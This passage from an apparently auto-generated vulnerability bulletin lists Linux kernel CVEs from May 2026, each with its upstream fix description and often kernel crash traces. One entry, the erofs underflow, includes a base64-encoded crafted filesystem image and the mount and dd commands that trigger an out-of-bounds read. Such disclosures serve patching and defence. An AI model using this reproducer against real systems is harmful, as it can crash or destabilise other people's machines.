slow path (which acquires the lock) to close this concurrency window. Additionally, this change addresses the following issues: When the DOUBLE_CHECK macro is enabled to inspect bitmap-related issues, the following error may be triggered: corruption in group 324 at byte 784(6272): f in copy != ff on disk/prealloc Analysis reveals that this is a false positive. There is a specific race window where the bitmap and the group descriptor become momentarily inconsistent, leading to this error report: ext4_mb_load_buddy ext4_mb_load_buddy __filemap_get_folio(create|lock) folio_lock ext4_mb_init_cache folio_mark_uptodate __filemap_get_folio(no lock) ...... mb_mark_used mb_mark_used_double mb_cmp_bitmaps mb_set_bits(e4b->bd_bitmap) folio_unlock The original logic assumed that since mb_cmp_bitmaps is called when the bitmap is newly loaded from disk, the folio lock would be sufficient to prevent concurrent access. However, this overlooks a specific race condition: if another process attempts to load buddy and finds the folio is already in an uptodate state, it will immediately begin using it without holding folio lock. | 2026-05-27 | 7.8 | CVE-2026-45942 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Clear Present bit before tearing down context entry When tearing down a context entry, the current implementation zeros the entire 128-bit entry using multiple 64-bit writes. This creates a window where the hardware can fetch a "torn" entry - where some fields are already zeroed while the 'Present' bit is still set - leading to unpredictable behavior or spurious faults. While x86 provides strong write ordering, the compiler may reorder writes to the two 64-bit halves of the context entry. Even without compiler reordering, the hardware fetch is not guaranteed to be atomic with respect to multiple CPU writes. Align with the "Guidance to Software for Invalidations" in the VT-d spec (Section 6.5.3.3) by implementing the recommended ownership handshake: 1. Clear only the 'Present' (P) bit of the context entry first to signal the transition of ownership from hardware to software. 2. Use dma_wmb() to ensure the cleared bit is visible to the IOMMU. 3. Perform the required cache and context-cache invalidation to ensure hardware no longer has cached references to the entry. 4. Fully zero out the entry only after the invalidation is complete. Also, add a dma_wmb() to context_set_present() to ensure the entry is fully initialized before the 'Present' bit becomes visible. | 2026-05-27 | 7.5 | CVE-2026-45944 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix a potential use-after-free of BTF object Refcounting in the check_pseudo_btf_id() function is incorrect: the __check_pseudo_btf_id() function might get called with a zero refcounted btf. Fix this, and patch related code accordingly. v3: rephrase a comment (AI) v2: fix a refcount leak introduced in v1 (AI) | 2026-05-27 | 7.8 | CVE-2026-45951 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/exynos: vidi: fix to avoid directly dereferencing user pointer In vidi_connection_ioctl(), vidi->edid(user pointer) is directly dereferenced in the kernel. This allows arbitrary kernel memory access from the user space, so instead of directly accessing the user pointer in the kernel, we should modify it to copy edid to kernel memory using copy_from_user() and use it. | 2026-05-27 | 7.1 | CVE-2026-45958 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: ccp - Fix a crash due to incorrect cleanup usage of kfree Annotating a local pointer variable, which will be assigned with the kmalloc-family functions, with the `__cleanup(kfree)` attribute will make the address of the local variable, rather than the address returned by kmalloc, passed to kfree directly and lead to a crash due to invalid deallocation of stack address. According to other places in the repo, the correct usage should be `__free(kfree)`. The code coincidentally compiled because the parameter type `void *` of kfree is compatible with the desired type `struct { ... } **`. | 2026-05-27 | 7.8 | CVE-2026-45959 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bonding: alb: fix UAF in rlb_arp_recv during bond up/down The ALB RX path may access rx_hashtbl concurrently with bond teardown. During rapid bond up/down cycles, rlb_deinitialize() frees rx_hashtbl while RX handlers are still running, leading to a null pointer dereference detected by KASAN. However, the root cause is that rlb_arp_recv() can still be accessed after setting recv_probe to NULL, which is actually a use-after-free (UAF) issue. That is the reason for using the referenced commit in the Fixes tag. [ 214.174138] Oops: general protection fault, probably for non-canonical address 0xdffffc000000001d: 0000 [#1] SMP KASAN PTI [ 214.186478] KASAN: null-ptr-deref in range [0x00000000000000e8-0x00000000000000ef] [ 214.194933] CPU: 30 UID: 0 PID: 2375 Comm: ping Kdump: loaded Not tainted 6.19.0-rc8+ #2 PREEMPT(voluntary) [ 214.205907] Hardware name: Dell Inc. PowerEdge R730/0WCJNT, BIOS 2.14.0 01/14/2022 [ 214.214357] RIP: 0010:rlb_arp_recv+0x505/0xab0 [bonding] [ 214.220320] Code: 0f 85 2b 05 00 00 48 b8 00 00 00 00 00 fc ff df 40 0f b6 ed 48 c1 e5 06 49 03 ad 78 01 00 00 48 8d 7d 28 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 06 0f 8e 12 05 00 00 80 7d 28 00 0f 84 8c 00 [ 214.241280] RSP: 0018:ffffc900073d8870 EFLAGS: 00010206 [ 214.247116] RAX: dffffc0000000000 RBX: ffff888168556822 RCX: ffff88816855681e [ 214.255082] RDX: 000000000000001d RSI: dffffc0000000000 RDI: 00000000000000e8 [ 214.263048] RBP: 00000000000000c0 R08: 0000000000000002 R09: ffffed11192021c8 [ 214.271013] R10: ffff8888c9010e43 R11: 0000000000000001 R12: 1ffff92000e7b119 [ 214.278978] R13: ffff8888c9010e00 R14: ffff888168556822 R15: ffff888168556810 [ 214.286943] FS: 00007f85d2d9cb80(0000) GS:ffff88886ccb3000(0000) knlGS:0000000000000000 [ 214.295966] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 214.302380] CR2: 00007f0d047b5e34 CR3: 00000008a1c2e002 CR4: 00000000001726f0 [ 214.310347] Call Trace: [ 214.313070] <IRQ> [ 214.315318] ? __pfx_rlb_arp_recv+0x10/0x10 [bonding] [ 214.320975] bond_handle_frame+0x166/0xb60 [bonding] [ 214.326537] ? __pfx_bond_handle_frame+0x10/0x10 [bonding] [ 214.332680] __netif_receive_skb_core.constprop.0+0x576/0x2710 [ 214.339199] ? __pfx_arp_process+0x10/0x10 [ 214.343775] ? sched_balance_find_src_group+0x98/0x630 [ 214.349513] ? __pfx___netif_receive_skb_core.constprop.0+0x10/0x10 [ 214.356513] ? arp_rcv+0x307/0x690 [ 214.360311] ? __pfx_arp_rcv+0x10/0x10 [ 214.364499] ? __lock_acquire+0x58c/0xbd0 [ 214.368975] __netif_receive_skb_one_core+0xae/0x1b0 [ 214.374518] ? __pfx___netif_receive_skb_one_core+0x10/0x10 [ 214.380743] ? lock_acquire+0x10b/0x140 [ 214.385026] process_backlog+0x3f1/0x13a0 [ 214.389502] ? process_backlog+0x3aa/0x13a0 [ 214.394174] __napi_poll.constprop.0+0x9f/0x370 [ 214.399233] net_rx_action+0x8c1/0xe60 [ 214.403423] ? __pfx_net_rx_action+0x10/0x10 [ 214.408193] ? lock_acquire.part.0+0xbd/0x260 [ 214.413058] ? sched_clock_cpu+0x6c/0x540 [ 214.417540] ? mark_held_locks+0x40/0x70 [ 214.421920] handle_softirqs+0x1fd/0x860 [ 214.426302] ? __pfx_handle_softirqs+0x10/0x10 [ 214.431264] ? __neigh_event_send+0x2d6/0xf50 [ 214.436131] do_softirq+0xb1/0xf0 [ 214.439830] </IRQ> The issue is reproducible by repeatedly running ip link set bond0 up/down while receiving ARP messages, where rlb_arp_recv() can race with rlb_deinitialize() and dereference a freed rx_hashtbl entry. Fix this by setting recv_probe to NULL and then calling synchronize_net() to wait for any concurrent RX processing to finish. This ensures that no RX handler can access rx_hashtbl after it is freed in bond_alb_deinitialize(). | 2026-05-27 | 7.8 | CVE-2026-45970 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Stop job scheduling across aie2_release_resource() Running jobs on a hardware context while it is in the process of releasing resources can lead to use-after-free and crashes. Fix this by stopping job scheduling before calling aie2_release_resource() and restarting it after the release completes. Additionally, aie2_sched_job_run() now checks whether the hardware context is still active. | 2026-05-27 | 7.8 | CVE-2026-45980 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix use-after-free in iomap inline data write path The inline data buffer head (dibh) is being released prematurely in gfs2_iomap_begin() via release_metapath() while iomap->inline_data still points to dibh->b_data. This causes a use-after-free when iomap_write_end_inline() later attempts to write to the inline data area. The bug sequence: 1. gfs2_iomap_begin() calls gfs2_meta_inode_buffer() to read inode metadata into dibh 2. Sets iomap->inline_data = dibh->b_data + sizeof(struct gfs2_dinode) 3. Calls release_metapath() which calls brelse(dibh), dropping refcount to 0 4. kswapd reclaims the page (~39ms later in the syzbot report) 5. iomap_write_end_inline() tries to memcpy() to iomap->inline_data 6. KASAN detects use-after-free write to freed memory Fix by storing dibh in iomap->private and incrementing its refcount with get_bh() in gfs2_iomap_begin(). The buffer is then properly released in gfs2_iomap_end() after the inline write completes, ensuring the page stays alive for the entire iomap operation. Note: A C reproducer is not available for this issue. The fix is based on analysis of the KASAN report and code review showing the buffer head is freed before use. [agruenba: Take buffer head reference in gfs2_iomap_begin() to avoid leaks in gfs2_iomap_get() and gfs2_iomap_alloc().] | 2026-05-27 | 7.8 | CVE-2026-45984 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udf: fix partition descriptor append bookkeeping Mounting a crafted UDF image with repeated partition descriptors can trigger a heap out-of-bounds write in part_descs_loc[]. handle_partition_descriptor() deduplicates entries by partition number, but appended slots never record partnum. As a result duplicate Partition Descriptors are appended repeatedly and num_part_descs keeps growing. Once the table is full, the growth path still sizes the allocation from partnum even though inserts are indexed by num_part_descs. If partnum is already aligned to PART_DESC_ALLOC_STEP, ALIGN(partnum, step) can keep the old capacity and the next append writes past the end of the table. Store partnum in the appended slot and size growth from the next append count so deduplication and capacity tracking follow the same model. | 2026-05-27 | 7.8 | CVE-2026-45991 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix unsigned underflow in z_erofs_lz4_handle_overlap() Some crafted images can have illegal (!partial_decoding && m_llen < m_plen) extents, and the LZ4 inplace decompression path can be wrongly hit, but it cannot handle (outpages < inpages) properly: "outpages - inpages" wraps to a large value and the subsequent rq->out[] access reads past the decompressed_pages array. However, such crafted cases can correctly result in a corruption report in the normal LZ4 non-inplace path. Let's add an additional check to fix this for backporting. Reproducible image (base64-encoded gzipped blob): H4sIAJGR12kCA+3SPUoDQRgG4MkmkkZk8QRbRFIIi9hbpEjrHQI5ghfwCN5BLCzTGtLbBI+g dilSJo1CnIm7GEXFxhT6PDDwfrs73/ywIQD/1ePD4r7Ou6ETsrq4mu7XcWfj++Pb58nJU/9i PNtbjhan04/9GtX4qVYc814WDqt6FaX5s+ZwXXeq52lndT6IuVvlblytLMvh4Gzwaf90nsvz 2DF/21+20T/ldgp5s1jXRaN4t/8izsy/OUB6e/Qa79r+JwAAAAAAAL52vQVuGQAAAP6+my1w ywAAAAAAAADwu14ATsEYtgBQAAA= $ mount -t erofs -o cache_strategy=disabled foo.erofs /mnt $ dd if=/mnt/data of=/dev/null bs=4096 count=1 | 2026-05-27 | 7.1 | CVE-2026-45999 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/nouveau: fix u32 overflow in pushbuf reloc bounds check nouveau_gem_pushbuf_reloc_apply() validates each relocation with if (r->reloc_bo_offset + 4 > nvbo->bo.base.size) but reloc_bo_offset is __u32 (uapi/drm/nouveau_drm.h) and the integer literal 4 promotes to unsigned int, so the addition is performed in 32 bits and wraps before the comparison against the size_t bo size. Cast to u64 so the addition happens in 64-bit arithmetic. [ Add Fixes: tag. - Danilo ] | 2026-05-27 | 7.8 | CVE-2026-46006 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: fix use-after-free in release path due to uncancelled work The mtk_jpeg_release() function frees the context structure (ctx) without first cancelling any pending or running work in ctx->jpeg_work. This creates a race window where the workqueue callback may still be accessing the context memory after it has been freed. Race condition: CPU 0 (release) CPU 1 (workqueue) ---------------- ------------------ close() mtk_jpeg_release() mtk_jpegenc_worker() ctx = work->data // accessing ctx kfree(ctx) // freed! access ctx // UAF! The work is queued via queue_work() during JPEG encode/decode operations (via mtk_jpeg_device_run). If the device is closed while work is pending or running, the work handler will access freed memory. Fix this by calling cancel_work_sync() BEFORE acquiring the mutex. This ordering is critical: if cancel_work_sync() is called after mutex_lock(), and the work handler also tries to acquire the same mutex, it would cause a deadlock. Note: The open error path does NOT need cancel_work_sync() because INIT_WORK() only initializes the work structure - it does not schedule it. Work is only scheduled later during ioctl operations. | 2026-05-27 | 7.8 | CVE-2026-46011 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: call sk_data_ready() after listener migration When inet_csk_listen_stop() migrates an established child socket from a closing listener to another socket in the same SO_REUSEPORT group, the target listener gets a new accept-queue entry via inet_csk_reqsk_queue_add(), but that path never notifies the target listener's waiters. A nonblocking accept() still works because it checks the queue directly, but poll()/epoll_wait() waiters and blocking accept() callers can also remain asleep indefinitely. Call READ_ONCE(nsk->sk_data_ready)(nsk) after a successful migration in inet_csk_listen_stop(). However, after inet_csk_reqsk_queue_add() succeeds, the ref acquired in reuseport_migrate_sock() is effectively transferred to nreq->rsk_listener. Another CPU can then dequeue nreq via accept() or listener shutdown, hit reqsk_put(), and drop that listener ref. Since listeners are SOCK_RCU_FREE, wrap the post-queue_add() dereferences of nsk in rcu_read_lock()/rcu_read_unlock(), which also covers the existing sock_net(nsk) access in that path. The reqsk_timer_handler() path does not need the same changes for two reasons: half-open requests become readable only after the final ACK, where tcp_child_process() already wakes the listener; and once nreq is visible via inet_ehash_insert(), the success path no longer touches nsk directly. | 2026-05-27 | 7.8 | CVE-2026-46015 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Prevent potential null-ptr-deref in ceph_handle_auth_reply() If a message of type CEPH_MSG_AUTH_REPLY contains a zero value for both protocol and result, this is currently not treated as an error. In case of ac->negotiating == true and ac->protocol > 0, this leads to setting ac->protocol = 0 and ac->ops = NULL. Thereafter, the check for ac->protocol != protocol returns false, and init_protocol() is not called. Subsequently, ac->ops->handle_reply() is called, which leads to a null pointer dereference, because ac->ops is still NULL. This patch changes the check for ac->protocol != protocol to !ac->protocol, as this also includes the case when the protocol was set to zero in the message. This causes the message to be treated as containing a bad auth protocol. | 2026-05-27 | 7.5 | CVE-2026-46024 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: avoid early lgr access in smc_clc_wait_msg A CLC decline can be received while the handshake is still in an early stage, before the connection has been associated with a link group. The decline handling in smc_clc_wait_msg() updates link-group level sync state for first-contact declines, but that state only exists after link group setup has completed. Guard the link-group update accordingly and keep the per-socket peer diagnosis handling unchanged. This preserves the existing sync_err handling for established link-group contexts and avoids touching link-group state before it is available. | 2026-05-27 | 7.5 | CVE-2026-46027 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/slab: return NULL early from kmalloc_nolock() in NMI on UP On UP kernels (!CONFIG_SMP), spin_trylock() is a no-op that unconditionally succeeds even when the lock is already held. As a result, kmalloc_nolock() called from NMI context can re-enter the slab allocator and acquire n->list_lock that the interrupted context is already holding, corrupting slab state. With CONFIG_DEBUG_SPINLOCK on UP, the following BUG is triggered with the slub_kunit test module: BUG: spinlock trylock failure on UP on CPU#0, kunit_try_catch/243 [...] Call Trace: <NMI> dump_stack_lvl+0x3f/0x60 do_raw_spin_trylock+0x41/0x50 _raw_spin_trylock+0x24/0x50 get_from_partial_node+0x120/0x4d0 ___slab_alloc+0x8a/0x4c0 kmalloc_nolock_noprof+0x164/0x310 [...] </NMI> Fix this by returning NULL early when invoked from NMI on a UP kernel. | 2026-05-27 | 7 | CVE-2026-46029 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ks8851: Reinstate disabling of BHs around IRQ handler If the driver executes ks8851_irq() AND a TX packet has been sent, then the driver enables TX queue via netif_wake_queue() which schedules TX softirq to queue packets for this device. If CONFIG_PREEMPT_RT=y is set AND a packet has also been received by the MAC, then ks8851_rx_pkts() calls netdev_alloc_skb_ip_align() to allocate SKBs for the received packets. If netdev_alloc_skb_ip_align() is called with BH enabled, then local_bh_enable() at the end of netdev_alloc_skb_ip_align() will trigger the pending softirq processing, which may ultimately call the .xmit callback ks8851_start_xmit_par(). The ks8851_start_xmit_par() will try to lock struct ks8851_net_par .lock spinlock, which is already locked by ks8851_irq() from which ks8851_start_xmit_par() was called. This leads to a deadlock, which is reported by the kernel, including a trace listed below. If CONFIG_PREEMPT_RT is not set, then since commit 0913ec336a6c0 ("net: ks8851: Fix deadlock with the SPI chip variant") the deadlock can also be triggered without received packet in the RX FIFO. The pending softirqs will be processed on return from spin_unlock_bh(&ks->statelock) in ks8851_irq(), which triggers the deadlock as well. Fix the problem by disabling BH around critical sections, including the IRQ handler, thus preventing the net_tx_action() softirq from triggering during these critical sections. The net_tx_action() softirq is triggered once BH are re-enabled and at the end of the IRQ handler, once all the other IRQ handler actions have been completed. __schedule from schedule_rtlock+0x1c/0x34 schedule_rtlock from rtlock_slowlock_locked+0x548/0x904 rtlock_slowlock_locked from rt_spin_lock+0x60/0x9c rt_spin_lock from ks8851_start_xmit_par+0x74/0x1a8 ks8851_start_xmit_par from netdev_start_xmit+0x20/0x44 netdev_start_xmit from dev_hard_start_xmit+0xd0/0x188 dev_hard_start_xmit from sch_direct_xmit+0xb8/0x25c sch_direct_xmit from __qdisc_run+0x1f8/0x4ec __qdisc_run from qdisc_run+0x1c/0x28 qdisc_run from net_tx_action+0x1f0/0x268 net_tx_action from handle_softirqs+0x1a4/0x270 handle_softirqs from __local_bh_enable_ip+0xcc/0xe0 __local_bh_enable_ip from __alloc_skb+0xd8/0x128 __alloc_skb from __netdev_alloc_skb+0x3c/0x19c __netdev_alloc_skb from ks8851_irq+0x388/0x4d4 ks8851_irq from irq_thread_fn+0x24/0x64 irq_thread_fn from irq_thread+0x178/0x28c irq_thread from kthread+0x12c/0x138 kthread from ret_from_fork+0x14/0x28 | 2026-05-27 | 7.5 | CVE-2026-46031 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio/cdx: Serialize VFIO_DEVICE_SET_IRQS with a per-device mutex vfio_cdx_set_msi_trigger() reads vdev->config_msi and operates on the vdev->cdx_irqs array based on its value, but provides no serialization against concurrent VFIO_DEVICE_SET_IRQS ioctls. Two callers can race such that one observes config_msi as set while another clears it and frees cdx_irqs via vfio_cdx_msi_disable(), resulting in a use-after-free of the cdx_irqs array. Add a cdx_irqs_lock mutex to struct vfio_cdx_device and acquire it in vfio_cdx_set_msi_trigger(), which is the single chokepoint through which all updates to config_msi, cdx_irqs, and msi_count flow, covering both the ioctl path and the close-device cleanup path. This keeps the test of config_msi atomic with the subsequent enable, disable, or trigger operations. Drop the pre-call !cdx_irqs test from vfio_cdx_irqs_cleanup() as part of this change: the optimization it provided is redundant with the !config_msi early-return inside vfio_cdx_msi_disable(), and leaving the test in place would be an unsynchronized read of state the new lock is meant to protect. | 2026-05-27 | 7.8 | CVE-2026-46036 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: only d_add() negative dentries when they are unhashed Ceph can call d_add(dentry, NULL) on a negative dentry that is already present in the primary dcache hash. In the current VFS that is not safe. d_add() goes through __d_add() to __d_rehash(), which unconditionally reinserts dentry->d_hash into the hlist_bl bucket. If the dentry is already hashed, reinserting the same node can corrupt the bucket, including creating a self-loop. Once that happens, __d_lookup() can spin forever in the hlist_bl walk, typically looping only on the d_name.hash mismatch check and eventually triggering RCU stall reports like this one: rcu: INFO: rcu_sched self-detected stall on CPU rcu: 87-....: (2100 ticks this GP) idle=3a4c/1/0x4000000000000000 softirq=25003319/25003319 fqs=829 rcu: (t=2101 jiffies g=79058445 q=698988 ncpus=192) CPU: 87 UID: 2952868916 PID: 3933303 Comm: php-cgi8.3 Not tainted 6.18.17-i1-amd #950 NONE Hardware name: Dell Inc. PowerEdge R7615/0G9DHV, BIOS 1.6.6 09/22/2023 RIP: 0010:__d_lookup+0x46/0xb0 Code: c1 e8 07 48 8d 04 c2 48 8b 00 49 89 fc 49 89 f5 48 89 c3 48 83 e3 fe 48 83 f8 01 77 0f eb 2d 0f 1f 44 00 00 48 8b 1b 48 85 db <74> 20 39 6b 18 75 f3 48 8d 7b 78 e8 ba 85 d0 00 4c 39 63 10 74 1f RSP: 0018:ff745a70c8253898 EFLAGS: 00000282 RAX: ff26e470054cb208 RBX: ff26e470054cb208 RCX: 000000006e958966 RDX: ff26e48267340000 RSI: ff745a70c82539b0 RDI: ff26e458f74655c0 RBP: 000000006e958966 R08: 0000000000000180 R09: 9cd08d909b919a89 R10: ff26e458f74655c0 R11: 0000000000000000 R12: ff26e458f74655c0 R13: ff745a70c82539b0 R14: d0d0d0d0d0d0d0d0 R15: 2f2f2f2f2f2f2f2f FS: 00007f5770896980(0000) GS:ff26e482c5d88000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f5764de50c0 CR3: 000000a72abb5001 CR4: 0000000000771ef0 PKRU: 55555554 Call Trace: <TASK> lookup_fast+0x9f/0x100 walk_component+0x1f/0x150 link_path_walk+0x20e/0x3d0 path_lookupat+0x68/0x180 filename_lookup+0xdc/0x1e0 vfs_statx+0x6c/0x140 vfs_fstatat+0x67/0xa0 __do_sys_newfstatat+0x24/0x60 do_syscall_64+0x6a/0x230 entry_SYSCALL_64_after_hwframe+0x76/0x7e This is reachable with reused cached negative dentries. A Ceph lookup or atomic_open can be handed a negative dentry that is already hashed, and fs/ceph/dir.c then hits one of two paths that incorrectly assume "negative" also means "unhashed": - ceph_finish_lookup(): MDS reply is -ENOENT with no trace -> d_add(dentry, NULL) - ceph_lookup(): local ENOENT fast path for a complete directory with shared caps -> d_add(dentry, NULL) Both paths can therefore re-add an already-hashed negative dentry. Ceph already uses the correct pattern elsewhere: ceph_fill_trace() only calls d_add(dn, NULL) for a negative null-dentry reply when d_unhashed(dn) is true. Fix both fs/ceph/dir.c sites the same way: only call d_add() for a negative dentry when it is actually unhashed. If the negative dentry is already hashed, leave it in place and reuse it as-is. This preserves the existing behavior for unhashed dentries while avoiding d_hash list corruption for reused hashed negatives. | 2026-05-27 | 7.5 | CVE-2026-46052 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rds: fix MR cleanup on copy error __rds_rdma_map() hands sg/pages ownership to the transport after get_mr() succeeds. If copying the generated cookie back to user space fails after that point, the error path must not free those resources again before dropping the MR reference. Remove the duplicate unpin/free from the put_user() failure branch so that MR teardown is handled only through the existing final cleanup path. | 2026-05-27 | 7.8 | CVE-2026-46053 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: fix overlayfs mmap() and mprotect() access checks The existing SELinux security model for overlayfs is to allow access if the current task is able to access the top level file (the "user" file) and the mounter's credentials are sufficient to access the lower level file (the "backing" file). Unfortunately, the current code does not properly enforce these access controls for both mmap() and mprotect() operations on overlayfs filesystems. This patch makes use of the newly created security_mmap_backing_file() LSM hook to provide the missing backing file enforcement for mmap() operations, and leverages the backing file API and new LSM blob to provide the necessary information to properly enforce the mprotect() access controls. | 2026-05-27 | 7.1 | CVE-2026-46054 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix string overrun due to missing termination When booting Ubuntu 26.04 with Linux 7.0-rc4 on an ARM64 Qualcomm Snapdragon X1 we see a string buffer overrun: BUG: KASAN: slab-out-of-bounds in aa_dfa_match (security/apparmor/match.c:535) Read of size 1 at addr ffff0008901cc000 by task snap-update-ns/2120 CPU: 5 UID: 60578 PID: 2120 Comm: snap-update-ns Not tainted 7.0.0-rc4+ #22 PREEMPTLAZY Hardware name: LENOVO 83ED/LNVNB161216, BIOS NHCN60WW 09/11/2025 Call trace: show_stack (arch/arm64/kernel/stacktrace.c:501) (C) dump_stack_lvl (lib/dump_stack.c:122) print_report (mm/kasan/report.c:379 mm/kasan/report.c:482) kasan_report (mm/kasan/report.c:597) __asan_report_load1_noabort (mm/kasan/report_generic.c:378) aa_dfa_match (security/apparmor/match.c:535) match_mnt_path_str (security/apparmor/mount.c:244 security/apparmor/mount.c:336) match_mnt (security/apparmor/mount.c:371) aa_bind_mount (security/apparmor/mount.c:447 (discriminator 4)) apparmor_sb_mount (security/apparmor/lsm.c:719 (discriminator 1)) security_sb_mount (security/security.c:1062 (discriminator 31)) path_mount (fs/namespace.c:4101) __arm64_sys_mount (fs/namespace.c:4172 fs/namespace.c:4361 fs/namespace.c:4338 fs/namespace.c:4338) invoke_syscall.constprop.0 (arch/arm64/kernel/syscall.c:35 arch/arm64/kernel/syscall.c:49) el0_svc_common.constprop.0 (./include/linux/thread_info.h:142 (discriminator 2) arch/arm64/kernel/syscall.c:140 (discriminator 2)) do_el0_svc (arch/arm64/kernel/syscall.c:152) el0_svc (arch/arm64/kernel/entry-common.c:80 arch/arm64/kernel/entry-common.c:725) el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:744) el0t_64_sync (arch/arm64/kernel/entry.S:596) Allocated by task 2120: kasan_save_stack (mm/kasan/common.c:58) kasan_save_track (./arch/arm64/include/asm/current.h:19 mm/kasan/common.c:70 mm/kasan/common.c:79) kasan_save_alloc_info (mm/kasan/generic.c:571) __kasan_kmalloc (mm/kasan/common.c:419) __kmalloc_noprof (./include/linux/kasan.h:263 mm/slub.c:5260 mm/slub.c:5272) aa_get_buffer (security/apparmor/lsm.c:2201) aa_bind_mount (security/apparmor/mount.c:442) apparmor_sb_mount (security/apparmor/lsm.c:719 (discriminator 1)) security_sb_mount (security/security.c:1062 (discriminator 31)) path_mount (fs/namespace.c:4101) __arm64_sys_mount (fs/namespace.c:4172 fs/namespace.c:4361 fs/namespace.c:4338 fs/namespace.c:4338) invoke_syscall.constprop.0 (arch/arm64/kernel/syscall.c:35 arch/arm64/kernel/syscall.c:49) el0_svc_common.constprop.0 (./include/linux/thread_info.h:142 (discriminator 2) arch/arm64/kernel/syscall.c:140 (discriminator 2)) do_el0_svc (arch/arm64/kernel/syscall.c:152) el0_svc (arch/arm64/kernel/entry-common.c:80 arch/arm64/kernel/entry-common.c:725) el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:744) el0t_64_sync (arch/arm64/kernel/entry.S:596) The buggy address belongs to the object at ffff0008901ca000 which belongs to the cache kmalloc-rnd-06-8k of size 8192 The buggy address is located 0 bytes to the right of allocated 8192-byte region [ffff0008901ca000, ffff0008901cc000) The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x9101c8 head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:-1 pincount:0 flags: 0x8000000000000040(head|zone=2) page_type: f5(slab) raw: 8000000000000040 ffff000800016c40 fffffdffe2d14e10 ffff000800015c70 raw: 0000000000000000 0000000800010001 00000000f5000000 0000000000000000 head: 8000000000000040 ffff000800016c40 fffffdffe2d14e10 ffff000800015c70 head: 0000000000000000 0000000800010001 00000000f5000000 0000000000000000 head: 8000000000000003 fffffdffe2407201 fffffdffffffffff 00000000ffffffff head: ffffffffffffffff 0000000000000000 00000000ffffffff 0000000000000008 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff0008901cbf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff0008 ---truncated--- | 2026-05-27 | 7.1 | CVE-2026-46055 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: amphion: Fix race between m2m job_abort and device_run Fix kernel panic caused by race condition where v4l2_m2m_ctx_release() frees m2m_ctx while v4l2_m2m_try_run() is about to call device_run with the same context. Race sequence: v4l2_m2m_try_run(): v4l2_m2m_ctx_release(): lock/unlock v4l2_m2m_cancel_job() job_abort() v4l2_m2m_job_finish() kfree(m2m_ctx) <- frees ctx device_run() <- use-after-free crash at 0x538 Crash trace: Unable to handle kernel read from unreadable memory at virtual address 0000000000000538 v4l2_m2m_try_run+0x78/0x138 v4l2_m2m_device_run_work+0x14/0x20 The amphion vpu driver does not rely on the m2m framework's device_run callback to perform encode/decode operations. Fix the race by preventing m2m framework job scheduling entirely: - Add job_ready callback returning 0 (no jobs ready for m2m framework) - Remove job_abort callback to avoid the race condition | 2026-05-27 | 7.8 | CVE-2026-46058 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: fix integer overflow in run_unpack() volume boundary check The volume boundary check `lcn + len > sbi->used.bitmap.nbits` uses raw addition which can wrap around for large lcn and len values, bypassing the validation. Use check_add_overflow() as is already done for the adjacent prev_lcn + dlcn and vcn64 + len checks added by commit 3ac37e100385 ("ntfs3: Fix integer overflow in run_unpack()"). Found by fuzzing with a source-patched harness (LibAFL + QEMU). | 2026-05-27 | 7.8 | CVE-2026-46062 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: defio: Disconnect deferred I/O from the lifetime of struct fb_info Hold state of deferred I/O in struct fb_deferred_io_state. Allocate an instance as part of initializing deferred I/O and remove it only after the final mapping has been closed. If the fb_info and the contained deferred I/O meanwhile goes away, clear struct fb_deferred_io_state.info to invalidate the mapping. Any access will then result in a SIGBUS signal. Fixes a long-standing problem, where a device hot-unplug happens while user space still has an active mapping of the graphics memory. The hot-unplug frees the instance of struct fb_info. Accessing the memory will operate on undefined state. | 2026-05-27 | 7.8 | CVE-2026-46065 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: validate payload size before accessing journal metadata r5c_recovery_analyze_meta_block() and r5l_recovery_verify_data_checksum_for_mb() iterate over payloads in a journal metadata block using on-disk payload size fields without validating them against the remaining space in the metadata block. A corrupted journal containing payload sizes that extend beyond the PAGE_SIZE boundary can cause out-of-bounds reads when accessing payload fields or computing offsets. Add bounds validation for each payload type to ensure the full payload fits within meta_size before processing. | 2026-05-27 | 7.1 | CVE-2026-46070 |
